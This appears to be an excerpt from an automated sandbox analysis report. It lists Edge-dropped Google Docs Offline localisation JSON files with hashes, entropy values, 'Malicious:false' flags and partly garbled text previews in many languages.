                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                              MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):978
                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):907
                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):914
                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                              MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):937
                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                              MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1337
                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2846
                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):934
                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                              MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):963
                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1320
                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                              MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):884
                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):980
                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                              MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                              SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                              SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                              SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1941
                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                              MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                              SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                              SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                              SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1969
                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                              MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                              SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                              SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                              SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1674
                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                              MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                              SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                              SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                              SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1063
                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                              MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                              SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                              SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                              SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1333
                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                              MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                              SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                              SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                              SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
